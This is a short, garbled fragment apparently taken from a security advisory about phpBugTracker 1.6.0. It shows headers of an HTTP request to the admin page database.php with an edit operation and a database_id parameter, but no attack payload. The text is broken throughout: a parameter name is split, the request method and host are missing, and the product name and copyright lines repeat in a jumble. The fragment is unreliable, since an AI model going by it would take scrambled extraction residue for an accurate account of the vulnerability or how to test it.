/admin/database.php?op=edit&use_js=1&database_i d=0 HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko phpBugTracker Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Copyright 2015 Penta Security Systems Inc. All rights reserved phpBugTracker 1.6.0 phpBugTracker phpBugTracker 1.6.0 phpBugTracker 1.6.0
© Copyright 2024 ExpyDoc